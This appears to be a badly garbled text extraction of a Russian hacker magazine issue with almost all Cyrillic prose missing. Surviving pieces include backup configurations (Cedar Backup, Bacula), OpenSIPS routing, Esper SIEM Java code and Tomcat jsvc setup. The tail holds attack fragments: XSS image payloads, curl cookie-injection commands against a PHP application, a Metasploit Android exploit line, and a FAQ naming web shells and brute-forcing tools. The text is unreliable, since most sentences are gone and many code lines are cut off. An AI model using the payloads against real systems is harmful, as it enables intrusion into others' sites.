backup

--encrypt-key, , GPG
(,
).
, SSH ,

.

Cedar Backup
incremental, Duplicity
. /,
/ , --include
--exclude. , () , man-.

restore. , :
$ duplicity restore --encrypt-key

75E1A006 sftp://adminuser
@leopard//home/adminuser/backup
/home/adminuser/restore
/. , -, (

CD/DVD-,
Amazon S3. Cedar Backup
, Subversion,
PostgreSQL/MySQL,
... , , ,
CD/DVD-, ,
. Cedar Backup GPG, ,
- , .
,
.
, , , ,
/ , Master
( ). ,
. Cron, ,
, SSH.
, /
:
(Collect) , , (,
, ). Cedar Backup
. .
(Stage)
. - , Cedar Backup
.
. ,
01 /192/ 2015
, :
cback.collect.
(Store) . / (
) ,
.
(Purge) ,
.
XML- ,
:
<reference> ,
;
<options> , , , ,
, , , ,
, ;
<peers> .
<peer>, , (local, , , , remote), ,
;
<collect> Collect. (, ), ,
(tar, tar.gz tar.bz2), / ;
<stage> .
<staging_dir>,
, ;
<store> .
, ;
<purge> .
<retain_days>, , ;
<extensions> . , , ,
,
, , ,
-
. Bacula
-
123
, ,
- .

:
<cb_cong>
<reference>
<...>
</reference>
<options>
<starting_day>tuesday</starting_day>
<working_dir>/home/adminuser/
tmp</working_dir>
<backup_user>adminuser</backup_user>
<backup_group>adminuser</backup_group>
<rcp_command>/usr/bin/scp -B</rcp_command>
</options>
<peers>
<peer>
<name>debian</name>
<type>local</type>
<collect_dir>/home/adminuser/cback/
collect</collect_dir>
</peer>
</peers>
<collect>
<...>
<collect_mode>daily</collect_mode>
<archive_mode>targz</archive_mode>
<ignore_le>.cbignore</ignore_le>
<dir>
<abs_path>/home/adminuser/Docs</abs_path>
<collect_mode>incr</collect_mode>
</dir>
<le>
<abs_path>/home/adminuser/.prole
</abs_path>
<collect_mode>weekly</collect_mode>
</le>
</collect>
<stage>
<staging_dir>/home/adminuser/backup/
stage</staging_dir>
</stage>
<store>
<...>
</store>
<purge>
<dir>
<abs_path>/home/adminuser/backup/
stage</abs_path>
<retain_days>7</retain_days>
</dir>
<dir>
<...>
</dir>
</purge>
<extensions>
<action>
<name>encrypt</name>
<module>CedarBackup2.extend.encrypt
</module>
<function>executeAction</function>
<index>301</index>
</action>
</extensions>
<encrypt>
<encrypt_mode>gpg</encrypt_mode>
<encrypt_target>Backup User
</encrypt_target>
</encrypt>
</cb_cong>
, ,
(
124
Unixoid
), <encrypt>.
<encrypt_target>. .

cback, --full. Cron .
Cedar Backup , ,
CD- ( DVD-) : ,
.
,
.
Cedar Backup : .
,
,

.
01 /192/ 2015
1 10,

Write Bootstrap = "/var/db/bacula/home-backup.
bsr" # ,

}
:
Schedule {
Name = "Weekly-schedule"
Run = Level=Full mon at 18:00
Run = Level=Incremental tue-fri at 17:00
}
,
, .
, Bacula .
, Bacula
Cron, .
BACULA
Bacula Bacula, ,
PKI. , . ,
,
.
.
, :
Bacula .

Bacula Director
-, , ,
:
.
. Bacula :
CloudMe.com Bacula Console Bacula Director ,
. , . , 3 19 ,
( Web) .
,
WebDAV. ,
(MySQL, PostgreSQL SQLite),
,
.
150 .
.
Bacula
DriveHQ.com 1 ,
Storage Director , , WebDAV FTP. /
?
WebDAV -
.
SOHO-
50 ,
File Daemon
.
200 .
,
Yadi.sk .. Bacula Director

10 , WebDAV
Storage Director.
,
.

.
, , .
,
,
,
Bacula
.
,
. , rsync/rsnapshot
Bacula Director Storage
, -
, Director ( )
/etc
.
.
.

Cedar
Bacula Director (job),
Backup , ( ,
, , ...).
:
,
Job {
.
Name = "home_backup" #
, , Type = Backup #
Duplicity Deja-Dup.
(backup, restore, verify...)

Level = Full #
(
,
, (

),

)
, .
Client = backup-client #

,
FileSet = "bc-home-set" #

,

Bacula, Schedule = "Weekly-schedule" #

Storage = backup-storage #
,
*nix-

, ,
Messages = Daemon #
.
Pool = backup-client-pool #

,
Priority = 10 #
.

-, .
125
01 /192/ 2015
Everett Collection@shutterstock.com
SIP-
Asterisk, , , .
, . Asterisk?
SIP:
, SIP . , SIP Session Initiation
Protocol,
. . RTP. SIP SDP (Session
Description Protocol) , ,
, .
,
SIP/SDP RTP (, ,
) . , ( , ).
1. ,
SIP- INVITE, SDP RTP.
SIP- .

rommanio@yandex.ru
2. , SIP ,
SIP- TRYING ( INVITE ) RINGING,
RINGING. RINGING ,

, , .
3. , SIP- 200 OK.
SDP, ,
.
, ,
ACK.
4. RTP ,
SIP SIP- . .
5. SIP- BYE,
ACK.
.
126
Unixoid
01 /192/ 2015

SIP
.
UAC UAS User Agent Client User
Agent Server.

. SIP-
UAC, UAS.
SIP-
.
SIP-
UAC/UAS.
SIP- UAC/
UAS
.

,
,

SIP URI.
.
B2BUA
SIP-, .

OpenSIPS

(
,
.
SIP-). B2BUA
, B2BUA , ,
-B2BUA B2BUA- .
B2BUA , SIP-, ,
SIP-. ,
.
.
, . , SIP- .
SIP- stateless stateful.
iptables, ,
. ... Stateful SIP- , , INVITE ACK. Stateless-
.
, SIP- ( Asterisk,
) *nix-.
, ,
Kamailio OpenSIPS. , . OpenSIPS.
$ wget -qO - http://apt.opensips.org/key.asc |

sudo apt-key add $ sudo sh -c "echo 'deb http://apt.opensips.org/
stable111 main' > /etc/apt/sources.list.d/
opensips.list"
$ sudo apt-get update
$ sudo apt-get install opensips opensips-console
OPENSIPS
/etc/opensips/opensipsctlrc
SIP-:
SIP_DOMAIN=192.168.56.103
SIP- DNS , OpenSIPS, SIP- .
, ,
, .

DNS- NAPTR SRV.
-, , .

OpenSIPS (
/etc/opensips/opensips.cfg) :
, ,
, OpenSIPS , .
. , , tm
.
, .
OpenSIPS. SIP-, ( ) OpenSIPS, . ,
. , , - ,
.
.
,
osipsconfig, ,
, .
( ,
*nix-, C++). ,
:
OPENSIPS?
OpenSIPS
, ,
SIP- B2BUA. Asterisk , -, , OpenSIPS SIP ,
Asterisk, -, Asterisk ,
, SIP, .
, Asterisk .
OpenSIPS : (
) Asterisk, , SIP , ,
. ,
.
2.0, -
,
, .
, ,
1.11.3, , ,
LTS.
, :
WWW
#
,
OpenSIPS
listen=udp:192.168.56.103:5060
#

TCP TLS
disable_tcp=yes
disable_tls=yes
RFC 3261
,
SIP-:
https://www.ietf.org/rfc/
rfc3261.txt
mpath="/usr/lib/opensips/modules"
#
sl tm
loadmodule "sl.so"
loadmodule "tm.so"
01 /192/ 2015
127

tm
modparam("tm", "fr_timeout", 5)
modparam("tm", "fr_inv_timeout", 30)
modparam("tm", "restart_fr_on_each_reply", 0)
modparam("tm", "onreply_avp_mode", 1)
#
-
SIGNALING
loadmodule "signaling.so"
<...>
, .
sl, stateless. .
tm, stateful-,
. , :
fr_timeeout ( trying).
. , ,
. ;
fr_inv_timeout . - ,

. ;
restart_fr_on_each_reply , fr_timeout
, .
false, true;
onreply_avp_mode AVP
(Atribute-Value pair) Reply.
, 1 , AVP, , . ,
, .
osipsconfig, OpenSIPS
), ,
:
SIGNALING tm sl .
, , ,
.
main route block,
. ,
. , :
1. , .
2. ,
relay.
3. , , ,
- . ,
,
, main() , .
route (
), . :
branch_route
. , stateful-;
failure_route ( 300) ,
OpenSIPS. stateful;
onreply_route .
stateful
, - , stateless ,
;
error_route SIP.
,
( -
INFO

OpenSIPS
Web-GUI
OpenSIPS-CP.
#
route{
#
MaxForwards

.

,
483

.
,
mf_process_maxfwd_header()
,
, ,

10.

if (!mf_process_maxfwd_header("70")) {
sl_send_reply("483","Too Many Hops");
exit;
}
#
To,
,

- .
if (has_totag()) {
# OPTIONS,

,

.

,

,

.
if (is_method("OPTIONS") &&
uri==myself && (! uri=~"sip:.*[@]+.*")) {
options_reply();
exit;
}
#
,
,

. loose_
route()
(
), ,

,
16.12 RFC 3261
(

).
if (loose_route()) {
#

,

. ,

,

, .
route(relay);
} else {
Unixoid
128
01 /192/ 2015
#
,
,
,
ACK,

,
.
if (is_method("ACK")) {
if ( t_check_trans() ) {
t_relay();
exit;
} else {
#
ACK

,
.
exit;
}
}
#

"404",
HTTP.
sl_send_reply("404","Not here");
}
exit;

.
if (is_method("REGISTER")) {
if (!save("location", "m")) {
sl_reply_error();
}
exit;
}
# lookup()
,

.
,

"404".

,
.
if (!lookup("location")) {
t_newtran();
t_reply("404", "Not Found");
exit;
}
route(relay);
}
#
.
# CANCEL

.
if (is_method("CANCEL")) {
if (t_check_trans()) {
t_relay();
}
exit;
}
# t_check_trans()

ACK,
CANCEL,

,
,

.
t_check_trans();
#
Route,
To (

ACK),
.
if (loose_route()) {
xlog("L_ERR",
"Attempt to route with preloaded Route's
[$fu/$tu/$ru/$ci]");
if (!is_method("ACK")) {
sl_send_reply("403",
"Preloaded Route denied");
}
}
#
,
Record-Route

SIP-
.
if (!is_method("REGISTER|MESSAGE")) {
record_route();
}
#
URI,
-
,

route(relay).
if (!uri==myself) {
route(relay);
}
#
presence (

) ,

.
PUBLISH SUBSCRIBE
if (is_method("PUBLISH|SUBSCRIBE")) {
sl_send_reply("503",
"Service Unavailable");
exit;
}
#
REGISTER.

,
.

,
}
#
relay,
.
route[relay] {
#
INVITE
,

, ,
,

.
if (is_method("INVITE")) {
t_on_failure("fail");
}
SEMS
OpenSIPS, Asterisk, SIP. , OpenSIPS
, , , , , , SEMS.
SEMS , SER ( OpenSIPS),
:
( ) ;
B2BUA/SBC (OpenSIPS , SEMS
);
.
Asterisk SIP-, , SEMS .
,

-
,
"500".
if (!t_relay()) {
send_reply("500",
"Internal Server Error");
}
}
# fail,

failure_route[fail] {
#

,
.
if (t_was_cancelled()) {
exit;
}
}
01 /192/ 2015
129
Linphone
OpenSIPS
Twinkle
# sudo opensips -C
OpenSIPS
/etc/default/opensips:
RUN_OPENSIPS=yes
:
$ sudo service opensips start

.

,
. Linphone Twinkle.
(Linphone Preferences) Manage SIP
Accounts, Add. Your
SIP identity SIP- ( sip:_@SIP-), SIP Proxy address
( SIP-!) SIP-.
Twinkle .
Wizard .
. Linphone ,
Twinkle .
, , , , MI-:
# sudo opensipsctl fo ul_dump

MI ( ) usrloc ul_dump, , .
. , -
xlog() tcpdump/Wireshark .
OpenSIPS SIP
.

, , ,
,
-
,
.
, ,
, OpenSIPS,
, , , ,
OpenSIPS B2BUA.
Linphone

OpenSIPS
. , Twinkle
, .
SYN/ACK
01 /192/ 2015

bsploit@gmail.com
jooka5000@flicker.com
130
01 /192/ 2015
131
Esper

Esper, .
,

Elasticsearch Logstash Kibana.
}
public String getCompname() {return compname;}
public String getFile() {return le;}
public String getVirusname() {return virusname;}
}
2. , java.util.Map,
,
, :
Map<String, Object> logonEventDef = new

HashMap<String, Object>();
logonEventDef.put("src_ip", String.class);
logonEventDef.put("login", int.class);
logonEventDef.put("result", String.class);
INTRO
, , :
Esper ,
(),
. EPL (Event Processing Language),
SQL. , , , ,
:
3. ,
:
String[] rewallPropsNames =
{"src_ip", "src_port","dst_ip",
"dst_port","action"};
Object[] rewallpropsTypes =
{String.class,int.class,String.class,
int.class,String.class};
select src_ip,dst_ip,dst_port from rewall.

win:time(30 sec)
group by src_ip
having count(distinct dst_ip) > 50
output rst every 1 hour
, , . Configuration
.
.
Esper
,
Java- . , .
Conguration engineCong = new Conguration();

engineCong.addEventType("antivirus",
Antivirus.class.getName());
engineCong.addEventType("logonEvent",
logonEventDef);
engineCong.addEventType("rewall",
rewallPropsNames,rewallpropsTypes);

Esper,
(goo.gl/jC2CJA) .
esper-5.1.0.jar, ,
esper\lib, Java- ( Eclipse
Libraries Add External
JARs).

EPServiceProviderManager.getDefaultProvider(), , , EPL ( ):

EPServiceProvider engine = EPServiceProvider

Manager.getDefaultProvider(engineCong);
EPAdministrator admin = engine.
getEPAdministrator();
//

EPStatement rule = admin.createEPL("select * from
logonEvent(result='fail').win:time(1 min) group by
src_ip having count(*)>30");
Esper , .
, :

, . :
1. :
public class Antivirus {

private String compname;
private String le;
private String virusname;
public Antivirus(String compname,String
le,String virusname){
this.compname=compname;
this.le=le;
this.virusname=virusname;
WWW

Esper:
www.espertech.com
- EPL-:
goo.gl/1z1buA
:
goo.gl/sDIuIo
rule.stop();
rule.start();
, Esper
.
EPRuntime
sendEvent, . , ,
:
EPRuntime runtime = engine.getEPRuntime();

runtime.sendEvent(new Antivirus("user-pc","c:\\
windows\\virus.exe","Trojan"));
132
SYN/ACK
01 /192/ 2015
Map<String, Object> logonEvent = new

HashMap<String, Object>();
logonEvent.put("src_ip", "10.0.0.1");
logonEvent.put("login", "root");
logonEvent.put("result", "fail");
runtime.sendEvent(logonEvent,"logonEvent");
Object [] rewallEvent={"10.0.0.1",32000,
"10.0.0.2",22,"permit"};
runtime.sendEvent(rewallEvent,"rewall");

. , UpdateListener:
public class MyUpdateListener implements

UpdateListener {
public void update(EventBean[] newEvents,
EventBean[] oldEvents) {
if (newEvents != null) {
String eventType = newEvents[0].
getEventType().toString();
Object event = newEvents[0].
getEventType();
System.out.println
("Event received "+eventType+" "
+ newEvents[0].getUnderlying());
}
}
}
, SQL-
60 ,
,
60 .

EPL-

:

() ,
addListener.
select src_ip,dst_ip,dst_port,isAllowed
from rewall.win:time(30 sec) as fw,
sql:mysql ['select case when exists
(select ip from scanAllowed
where ip=${src_ip}) then true
else false end as isAllowed']
as allowed where isAllowed=0
group by fw.src_ip
having count(distinct fw.dst_ip) > 50
output rst every 1 hour;
UpdateListener myListener = new MyUpdateListener();

rule.addListener(myListener);

update, . , EPL- .

XML JSON (
Elasticsearch) EventRenderer, EPRuntime
:
. ,
,

outer join:
JSONEventRenderer jsonRenderer = engine.

getEPRuntime().getEventRenderer().
getJSONRenderer(rule.getEventType());
String json = jsonRenderer.render(event);
select src_ip,dst_ip,dst_port,ip
from rewall.win:time(30 sec) as fw
left outer join sql:mysql ['select ip from
scanAllowed'] as allowed
on fw.src_ip=allowed.ip
where ip is null
group by fw.src_ip
having count(distinct fw.dst_ip) > 50

, ,
: DNS, Proxy, ,
.
. , ,
EPL- (
), , ,
Esper
JDBC-.
API.
. ConfigurationDBRef :
, , . .
CongurationDBRef mysql = new CongurationDBRef();

mysql.setDriverManagerConnection
("com.mysql.jdbc.Driver",
"jdbc:mysql://localhost/testDB", "user", "password");

mysql.setExpiryTimeCache(60, 120);
engineCong.addDatabaseReference("mysql", mysql);
INFO
Esper

jdbc,

Java-,
EPL,
.
Esper IP-, scanAllowed, ,

:
Esper ,
JIRA (goo.gl/TvudJL).
, , ,
ipplan,
.
, . ,
Wi-Fi- , -
. ,
Esper -
01 /192/ 2015
133
Esper
sql:mysql ['select description from ipplan

where ${ipToInt(dst_ip)} between startaddr
and endaddr'] as dst_net
where src_net.description = 'wi' and
dst_net.description='database' and
action='permit'
output rst every 1 hour

EPL, IP-, GeoIP
(goo.gl/TIOP8B), .
EPL

. Esper
.
Log4j.
, log4j.xml log4j.
configuration (
,
esper\etc):
java -Dlog4j.
conguration=log4j.xml ...
EPL-

@Audit, :
@Audit('stream,property')
select src_ip,dst_ip,
dst_port from rewall
IP- ,
EPL-:
, . , stream
, ,
property . Esper .
, EPL-,
. :
public class MyEsperUtils {

public static Long ipToInt(String addr) {
String[] addrArray = addr.split("\\.");
long num = 0;
for (int i=0;i<addrArray.length;i++) {
int power = 3-i;
num += ((Integer.parseInt
(addrArray[i])%256 *
Math.pow(256,power)));
}
return num;
}
}
engineCong.getEngineDefaults().getLogging().
setEnableQueryPlan(true);
SQL- :
engineCong.getEngineDefaults().getLogging().
setEnableJDBC(true);
, , , :
, , .
engineCong.addPlugInSingleRowFunction
("ipToInt", "MyEsperUtils", "ipToInt");
, EPL- wifi database:
select src_ip,dst_ip,action,src_net.
description,dst_net.description
from rewall as fw,
sql:mysql ['select description from ipplan
where ${ipToInt(src_ip)} between startaddr
and endaddr'] as src_net,
WARNING

,
Esper

.
LOGSTASH
,
, .

Elasticsearch Logstash
Kibana (ELK) (goo.gl/MHIeiG). Elasticsearch () ,
Kibana , Logstash .
,
134
SYN/ACK
01 /192/ 2015
//
Redis
List<String> events = jedisTake.blpop(0,input);
String event = events.get(1);
JSONObject eventJson = new JSONObject(event);
//
String type = eventJson.getString("type");

Map<String, Object> eventMap = new HashMap
<String, Object>();
Iterator<String> keys = eventJson.keys();
while(keys.hasNext()){
String key = keys.next();
String value = eventJson.getString(key);
//

eventMap.put(key, value);
}
//

runtime.sendEvent(eventMap,type);
input . update,
JSON alerts:
SIEM. , , . ,
, Logstash ,
Elasticsearch.
Redis,
.
Redis :
input Logstash , JSON-.
;
alerts .

Esper ELK
for(int i=0; i<newEvents.length; i++){

//
EventType eventType = newEvents[i].

getEventType();
jsonRenderer = runtime.getEventRenderer().
getJSONRenderer(eventType);
// JSON-
alertEvent = jsonRenderer.
render(newEvents[i]);
//
Redis
jedisPublish.rpush(alerts, alertEvent);
}
pipe.sync();
, java.util.Map. Redis Jedis,

( Jedis):
Jedis jedisTake = jedisFactory.getJedisPool().

getResource();
public void update(EventBean[] newEvents,

EventBean[] oldEvents) {
Jedis jedisPublish = jedisFactory.
getJedisPool().getResource();
Pipeline pipe = jedisPublish.pipelined();
String alertEvent = "";

ELK-
Logstash
Redis Elasticsearch, Kibana
.
, , Java-
Esper,

. Esper
Elasticsearch Logstash Kibana,
ELK- SIEM.
, (goo.gl/sDIuIo),

,
.
!
01 /192/ 2015
135

sgvozdetskiy@yahoo.com
APACHE
TOMCAT UNIX-
Apache Tomcat -,
,
-. , . UNIX Tomcat.
, root , root ,
. ,
*nix,
root- , ,
wheel. ,
. MS Windows,
,
.
, .
, , , .
, ,
. ,
, . , . ,
.
, . ,
,
,
.
, httpd
Apache, 2 apache. , , ,
. Apache
136
SYN/ACK
01 /192/ 2015
, .
.
1

Java- Tomcat,
. , ,
. .
( ) ,
- . ,
.
,
? ,
, ?
, . ,
,
/bin/su tomcat $CATALINA_HOME/bin/startup.sh. ,
tomcat, , , , Linux/UNIX? .
, , root. ? :
, .
root .
, ,
.
changelog .
,
root-.
.
, , , .
?
root httpd: ( Perl),
- DocumentRoot, SQL , . , :
1. httpd, MySQL, PostgreSQL
? : root- .
2. , ,
? . : , SUID
fork().
(. 1).
. master ,
nobody, ,
, ( 80). , ,
, (/), nobody .
.
(. 2).
, ? PPID.
: master PPID 1,
init, PPID = PID master-.
, ,
syslogd . ,
, , SIGHUP, reload
.1. nginx
. 2. nginx
, -
,
. SIGSTOP, (SIGCONT).
, ,

, root Tomcat.
, .
JSVC
WWW

:
goo.gl/DCQrsE

Tomcat:
goo.gl/30ZcSl
JVM:
goo.gl/yhrnVd
Apache Commons jsvc, Tomcat.

, Tomcat UNIX-. Jsvc UID fork(),
,
, Java-, Java-, assertions , , , -help.
, ,
, base CentOS
jakarta-commons-daemon-jsvc, Java daemon launcher. , . make GCC. $CATALINA_HOME/bin/ commons-daemon-native.tar.gz,
unix:

, ,
.
, ,
. .
.
*nix- , , , . ,
Solaris: pcred(1), UID
GID . , , , ,
.
,
.
01 /192/ 2015
137
$ tar xzvf commons-daemon-native.tar.gz ;

cd commons-daemon-1.0.10-native-src/unix/
(goo.gl/TX7Y1s) , ./congure ; make ; cp jsvc ../.. ; cd ../.., ,
./congure, ,
, gentoo- .
-, -withjava=$JAVA_HOME, JAVA_HOME JDK. , Java,
, ,
. -, -withos-type=linux, ,
.
JAVA_HOME/include/<OS_ _ _ _JDK>,
,
Sun. -, GCC
CFLAGS=-m64 LDFLAGS=-m64, , .
: x86-, 32- .

: ./congure -with-java=/usr/java/latest -withos-type=/include/linux CFLAGS=-m64 LDFLAGS=-m64,
, Wiki Gentoo (goo.gl/jmGho0) .
,
.
,
CentOS 5, , Tomcat 6.
make clean make,
, , fork().
, .
, . ,
, .
, ( , ),
,
. Linux
clone(2), . ( ) ,

, -. Java JVM, , , ,
root.
# chkcong: 345 73 21
# description: Tomcat super daemon
(. 3).
libservice.a. , Malformed archive ar. 2.20

.
, (Tomcat). bin
. 7.x ,
Java setenv.sh,
(JAVA_OPTS="Xmx2G -Xms1G ..."). , bin, daemon.
sh, TOMCAT_USER
, ,
daemon. ,
/sbin/nologin, ,
.
:
. 3.
Tomcat
$ su daemon
This account is currently not available.
$ ll /etc/init.d/tomcatd
lrwxrwxrwx 1 root root 30 Jun 26 13:38 /etc/
init.d/tomcatd -> /opt/tomcatd/bin/daemon.sh
CentOS, ,
chkconfig , :
$ head /etc/init.d/tomcatd
#!/bin/sh
- , .
catalina-daemon.out. , catalinadaemon.err.
, root, ,
daemon. , /sbin/nologin,
- , , .

Java-, UNIX, .
:
1. , fork(), .
2. Im ready, wait_child()
.
3. , nginx. Java-, , Tomcat,
.
140
FAQ
01 /192/ 2015

FAQ@REAL.XAKEP.RU
SSH Mosh. :
mosh root@server
Wi-Fi- SSH-,
- ?
, . Mosh. , root,
. :
SSH-,
, .
Wi-Fi ,
IP;
,
UDP predictive
echo;
Mosh
, .
<trl + C> ,
500- .
Zemond
3em0nd@gmail.com

arp-scan.
ARP-, . :

:
1. Mosh SSH
mosh-server, UDP- 60000 61000.
2. SSH-.
3. mosh-client mosh, 1.
, , tmux
,
.
IP MAC-
. ARP- .
arp-scan

. GUI Winff:
,
Ubuntu?

. ,
GUI. . :
Q
A
sudo aptitude install winff
Avidemux
sudo aptitude install ffmpeg lame

,

Avidemux:
ffmpeg -i video.avi -acodec pcm_s16le

-ac 2 -ab 128k -vn -y "most.wav"
lame --preset cd most.wav music.mp3
rm most.wav
sudo aptitude install avidemux
, . , FFmpeg
(goo.gl/1fKyBo).

, ,
. ,
,
, , ,

. , , GUI
,

Avidemux.
,
FFmpeg ,
. Cinelerra, Jahshaka, Kdenlive, Kino
LiVES. , , ,
,
FFmpeg .
141
FAQ
01 /192/ 2015
sudo arp-scan --localnet >>

result.arp-scan
,
--interface:
sudo arp-scan --interface=eth0

192.168.0.0/24
, ,

?

r57shell,
( , , : goo.gl/PGjbll).
b374k shell (goo.gl/QVA90d) .
,
PHP, , . , .

memtester (goo.gl/qbqThx). . memtest86,

. Memtester ,
.
:

5 .
memtester 5g 1

Ubuntu Server. GUI, , ?
. megacli
(goo.gl/2DuuQL),
. ,
,
: goo.gl/hyvS8W.
. m , . , GPT. n, ,
, primary. , 1.
, w, . ,
, p. , . - , , , .
,
.
MegaCli64 -PDList -Aall

, .
, , :
sda, sdb , , . , :
megacli -PDList -Aall | egrep 'Slot|Raw|Inquiry|Enclosure|Firmware state'

- :
Enclosure Device ID: 32

Slot Number: 2
Enclosure position: 1
Raw Size: 558.911 GB [0x45dd2fb0 Sectors]
Firmware state: Online, Spun Up
Inquiry Data: BTW INTEL SSDSC2
Enclosure Device ID: 32
Slot Number: 3
Enclosure position: 1
Raw Size: 2.728 TB [0x15d50a3b0 Sectors]
Firmware state: Uncongured(good), Spun Up
Inquiry Data: 149TOSHIBA
3 .
. , ext4.

fsck.ext4 /dev/sdX1
, GPT . ,
.
mkdir /disk1
.
:
mount /dev/sdX /disk1
, fstab.
, UUID. . UUID
blkid /dev/sdX1
UUID /etc/fstab:
nano /etc/fstab
.
fdisk. :
fdisk /dev/sdX
- :
UUID="a35db35e-d660-910a-478e-4927169bd09b"/disk1
ext4 defaults,noatime,nodiratime 0 0
FAQ
142
, ,
.

-, :
?
, ! , ,

(goo.gl/BSMLmS). ,
. exploit-db.com , .
Q
A
/etc/fstab , UUID
. ?

.
.
:
Q
A
ls -l /dev/disk/by-uuid

blkid (, , ).
,
sudo blkid
.
01 /192/ 2015
,

?
! ,
checkio.org.

Python.
,
, .
, Checkio
. , Learning
.
. Score
Games Single Player Game. , , . Competition Multi Player Game.
.
pythonchallenge.com.
, ,
? , CTF
Python.
,
Q
A

, ,
SQLMAP
-
,

. , . codecademy.com
, .
: <Ctrl + C> <Ctrl + V>.
?
,
<Shift + Ins>. ,
.
, : ...
:,
. , , .
- ,
<Ctrl +
V>. :
( ) EditPaste
<Ctrl + V>
.
- .
Q
A
,
pass.txt,
.
,
. ,
- .

Intruder Burp
Suite,
. , .
sniper, - :
WATCH DOGS
Watch dogs, ,
?
,
,
, sqlmap
- .

.
,
VDS 5
,

.
,
, ,

.
information gathering
,
,
.
, ,

.
,
,

.
/$aa$/pass.txt
, ,
, , . ,

Status, .
.
?
, , IPython
(ipython.org).
Python,
Q
A
01 /192/ 2015
, ,
. ,
(goo.gl/CLUfM3) : goo.
gl/TK6Vvw, IPython .

, IPython . - ,
- , . must have
.
,
,
.
?
, ,
. PCIe x.0, PCI
. , .
PCIe 2.0,
3- PCI .
,

.
Q
A
143
FAQ
, , , ,

.
. ,
, ,
, . -
. ,
, :
, , .
,
Wireshark?
, , tcpdump. ,
: , , , ,
.
-
Q
A
tcpdump
;

.
. ,

tcpdump -i eth0
, .
,
.
,
? .xakep.ru!
group

[!
WWW 2.0
144
01
UNSHORT.ME (unshort.me)
Unshort.me ,
. , bit.ly, goo.gl .
, URL ,
, , ,
. - (
), unshort.me.
Chrome, ,
.
GOOGLE GUIDE FOR TECHNICAL DEVELOPMENT
IT Google
(www.google.com/edu/tools-and-solutions/guide-for-technicaldevelopment/index.html)
Google
IT . ,

(-, ,
, ,
). , .
, IT-.
03
RECAPTCHA MAILHIDE
(https://www.google.com/recaptcha/admin#mailhide)
Google API reCAPTCHA
,
Mailhide.
email,
HTML-,

.
. , Google ,
.
02
SKYPE (skype.com)
,
. -
- - ,
. ,
, ,

Skype. Chromebook,

.
email
-
04

Хакер 2015 01

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2015 01

Загружено:

Авторское право:

Доступные форматы

192

: claim@glc.ru. : 115280, , . , . 19, . : : 606400, ., -, . , .,

Stay tuned, stay ][!

Mozilla Firefox . , Firefox 1.0 10 2004 , .

2016 Samsung Apple (

Raspberry Pi Model B+,

: KEEN Team, ][.

<div class="input-group clockpicker">

Front-end Job Interview

var pswpElement = document.

FIREFOX DEVELOPER EDITION

WebIDE - ( ) Firefox 33, Developer

WEB AUDIO EDITOR

Web Audio API .

Web Audio Editor

$ sudo apt-get install git-core gnupg

$ chmod u+x android-ndk-r10c-linux-x86_64.bin

$ tar xjvf arm-unknown-linux-gnueabilinaro_4.6.4-2013.05-build_2013_05_18.tar.bz2

$ make -j9 CFLAGS_MODULE=-fno-pic

ui_print("Extracting System Files...");

ui_print("Extracting Kernel les...");

Bash Linaro c FTP :

$ cd AnyKernel && zip -r AnyKernel.zip *

$ ./congure --host=arm-linux --enable-static

$ mkdir htop && cd $_

$ tar xzvf ncurses-5.9.tar.gz

$ ./congure --host=arm --enable-static

$ mkdir ngrep && cd $_

$ export CFLAGS="--static -I${SYSROOT_ADDITIONS}

: SSH VNC. SSH- Android Linux

Ubuntu Linux Deploy

Art Hakker Photography@flicker.com

Android 5.0 WebView

, 5.0 , SELinux, vold

Android Device Manager

Google Chrome Android. ,

Onavo Extend: goo.gl/YYA1j

<img src=x onerror=&#000097;lert(&#x32;);>

, Visa/MasterCard NFC (PayPass, PayWave).

CROSS-SITE WEBSOCKET HIJACKING

HTTP/1.1 101 Web Socket Protocol Handshake

$protected = array("_GET", "_POST", "_SERVER",

function add_shutdown($name, $arguments=array())

array('function' => $name,

$ curl --cookie "GLOBALS=1; shutdown_functions[0]

$ curl --cookie "GLOBALS=1; shutdown_queries[]=

*User CP >Edit Prole > **Custom User Title*

<img src=x onerror=alert('XSS');>

SAMSUNG GALAXY KNOX ANDROID

MITM-, JavaScript- HTML, .

shared_preference, onCreate() Core.startSelfUpdateCheck().

msf > use exploit/android/browser/

Samsung Galaxy S5;

IPMI Authentication Bypass via Cipher 0

UDP 623, IPMI 2.0, .

IPMI 2.0 RAKP Authentication Remote Password Hash

UDP 623, IPMI 2.0 user-logins.

IPMI Anonymous Authentication / Null user

- null user, - anonymous authentication.

UDP 623, IPMI 1.5, .

Supermicro IPMI UPnP Vulnerability

Supermicro UPnP SSDP UDP

Supermicro IPMI Clear-text Passwords

<img src=x onerror=alert(2);>